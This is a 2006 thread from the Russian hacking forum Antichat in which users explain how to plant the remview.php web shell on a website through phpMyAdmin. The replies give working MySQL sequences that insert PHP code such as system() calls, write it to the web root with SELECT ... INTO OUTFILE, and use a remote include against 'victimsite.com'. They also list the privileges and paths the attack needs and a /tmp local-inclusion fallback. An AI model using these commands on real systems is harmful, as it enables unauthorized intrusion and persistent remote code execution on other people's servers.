Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Залить remview.php через phpMyAdmin |
03.02.2006, 23:32
|
|
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499
Репутация:
0
|
|
Залить remview.php через phpMyAdmin
Есть доступ к phpmyadmin, как залить remview.php на сайт?
Заранее благодарен!
|
|
|
04.02.2006, 03:20
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
select запись с шелом into outfile 'path_to_file/file.php'
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
04.02.2006, 10:29
|
|
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499
Репутация:
0
|
|
А можно поконкретней, пожалуйста?
|
|
|
|
04.02.2006, 13:17
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
INSERT INTO table VALUES(7777777, 0, "<? system($e); ?>", 0)
SELECT * FROM table WHERE (param1 = 7777777) INTO OUTFILE /home/site/www/shell.php
Если не прав поправте.
|
|
|
|
04.02.2006, 14:14
|
|
Новичок
Регистрация: 03.09.2005
Сообщений: 7
Провел на форуме:
40499
Репутация:
0
|
|
Ругается на ошибку "1064: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table VALUES(7777777, 0, "<? system($e); ?>", 0)
SELECT * FROM"
|
|
|
|
04.02.2006, 14:34
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
Подумай сам.... что это может быть.. запрос тебе дали...Или ты хочешь чтобы дебе Полные права дали на Этой тачке? Гы... Иногда надо думать головой...
|
|
|
|
04.02.2006, 15:26
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
Вообще phpMyAdmin тут не причем, есть он или нет его - не имеет значения. Ну... практически =) Дело в MySQL. Но чтобы залить файл, тот же шелл, на хостинг тебе потребуется следующее:
1) Включенные MySQL файловые функции (а их почти все вырубают для безопасности)
2) Знать полный адрес от корня файловой системы до web контента
3) Иметь в вебе диру с 0770 или 0777 чмодом
4) Выучить скуль =)
2 SanyaX
значение INTO OUTFILE ковычками обособляется =)
|
|
|
|
04.02.2006, 18:54
|
|
Новичок
Регистрация: 04.02.2006
Сообщений: 1
Провел на форуме:
9129
Репутация:
1
|
|
Вот так надо:
CREATE TABLE `shell` (`script` TEXT NOT NULL) COMMENT = 'table for include';
INSERT INTO `shell` ( `script` ) VALUES ('<? phpcode(); ?>');
SELECT script FROM `shell` INTO OUTFILE '/home/localhost/www/shell.php';
DROP TABLE `shell`;
Вместо <? phpcode(); ?> пишешь код шелла или <? include($_GET[‘shell’]); ?> а потом переходишь на http://victimsite.com/shell.php?shel...ru/remview.php
Никаких кавычек в INTO OUTFILE не надо. Только права должны быть рутовые...
Последний раз редактировалось Ekib; 04.02.2006 в 18:56..
|
|
|
|
05.02.2006, 00:19
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
если нет возможности в веб дирриктории создать файлик то можно поробовать в тмп и если phpmyadmin бажная(кажись это 2.6.*, или ещё какие, точно не помню) то проинклудить локально с её помощью, вотъ
P.S.
а файлик так создаем :
select '<? phpinfo(); ?>' from test into outfile '/tmp/ddd'
Последний раз редактировалось ShAnKaR; 05.02.2006 в 00:24..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
